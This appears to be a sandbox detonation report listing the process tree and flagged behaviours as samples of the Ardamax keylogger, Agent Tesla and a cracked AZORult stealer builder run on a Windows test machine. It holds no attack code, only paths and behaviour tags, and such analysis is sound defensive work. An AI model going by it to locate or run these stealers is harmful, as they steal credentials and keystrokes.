C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4472

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1308

C:\Users\Admin\AppData\Local\Temp\Temp1_Ardamax_Keylogger_4.8.9ecfba.zip\Ardamax Keylogger 4.8\setup.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ardamax_Keylogger_4.8.9ecfba.zip\Ardamax Keylogger 4.8\setup.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ardamax.com/keylogger/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffc89413cb8,0x7ffc89413cc8,0x7ffc89413cd8
    3⤵
    PID:1568
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
    3⤵
    PID:1708
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5016
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
    3⤵
    PID:1044
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
    3⤵
    PID:1152
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
    3⤵
    PID:3812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
    3⤵
    PID:2008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
    3⤵
    PID:2028
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2744
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
    3⤵
    PID:4508
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,9497017231498507595,16547328850597344875,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
    3⤵
    PID:1732

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2464

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4960

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Ardamax_Keylogger_4.8.9ecfba.zip\Ardamax Keylogger 4.8\Serial.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3908

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Ardamax_Keylogger_4.8.9ecfba.zip\Ardamax Keylogger 4.8\Serial.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1308

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2588

C:\Users\Admin\Desktop\TL-TROJAN-master\TL.STEALER\STEALER.AgentTesla\Agent_Tesla.607cb9\Agent Tesla [Premium]\Agent Tesla.exe
"C:\Users\Admin\Desktop\TL-TROJAN-master\TL.STEALER\STEALER.AgentTesla\Agent_Tesla.607cb9\Agent Tesla [Premium]\Agent Tesla.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.agenttesla.com/login-register
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffc89413cb8,0x7ffc89413cc8,0x7ffc89413cd8
    3⤵
    PID:1696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1952 /prefetch:2
    3⤵
    PID:2428
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2240
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
    3⤵
    PID:440
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
    3⤵
    PID:1644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
    3⤵
    PID:2200
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
    3⤵
    PID:4056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
    3⤵
    PID:2292
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
    3⤵
    PID:968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
    3⤵
    PID:3436
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3684 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3488
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
    3⤵
    PID:4896
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
    3⤵
    PID:3000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
    3⤵
    PID:2396
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10221264579225781106,1838771466320651193,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
    3⤵
    PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.agenttesla.com/login-register
  2⤵
  PID:1432
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0xfc,0x130,0x7ffc89413cb8,0x7ffc89413cc8,0x7ffc89413cd8
    3⤵
    PID:4332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.agenttesla.com/forgot-password
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1036
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xc0,0x12c,0x7ffc89413cb8,0x7ffc89413cc8,0x7ffc89413cd8
    3⤵
    PID:1040
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,16676601898702838153,9273871761811586354,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1952 /prefetch:2
    3⤵
    PID:3132
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,16676601898702838153,9273871761811586354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
    3⤵
    PID:3684
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,16676601898702838153,9273871761811586354,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
    3⤵
    PID:3956
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,16676601898702838153,9273871761811586354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
    3⤵
    PID:2184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,16676601898702838153,9273871761811586354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
    3⤵
    PID:4812

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2284

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:976

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4484
- C:\Program Files\Microsoft Office\root\Office16\Winword.exe
  "C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Agent_Tesla.607cb9.zip\Agent Tesla [Premium]\settings.ini"
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:976

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4952

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3808

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ethicalhackingtutorials.com/
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:3924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc89413cb8,0x7ffc89413cc8,0x7ffc89413cd8
  2⤵
  PID:1028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,14223112393990166097,15109433110740619444,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:2316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,14223112393990166097,15109433110740619444,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,14223112393990166097,15109433110740619444,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
  2⤵
  PID:4584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,14223112393990166097,15109433110740619444,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:1476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,14223112393990166097,15109433110740619444,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  2⤵
  PID:1704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,14223112393990166097,15109433110740619444,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,14223112393990166097,15109433110740619444,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:2512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,14223112393990166097,15109433110740619444,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5532 /prefetch:8
  2⤵
  PID:4392
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,14223112393990166097,15109433110740619444,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
  2⤵
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1904,14223112393990166097,15109433110740619444,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5836 /prefetch:8
  2⤵
  PID:3148

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1752

C:\Users\Admin\Desktop\TL-TROJAN-master\TL.STEALER\STEALER.Azorult\AZORult_Stealer_Full_Cracked.182d68\AZORult stealer\builder.exe
"C:\Users\Admin\Desktop\TL-TROJAN-master\TL.STEALER\STEALER.Azorult\AZORult_Stealer_Full_Cracked.182d68\AZORult stealer\builder.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4804

C:\Users\Admin\Desktop\TL-TROJAN-master\TL.STEALER\STEALER.Azorult\AZORult_Stealer_Full_Cracked.182d68\AZORult stealer\build.exe
"C:\Users\Admin\Desktop\TL-TROJAN-master\TL.STEALER\STEALER.Azorult\AZORult_Stealer_Full_Cracked.182d68\AZORult stealer\build.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5024

C:\Users\Admin\Desktop\TL-TROJAN-master\TL.STEALER\STEALER.Azorult\AZORult_Stealer_Full_Cracked.182d68\AZORult stealer\build.exe
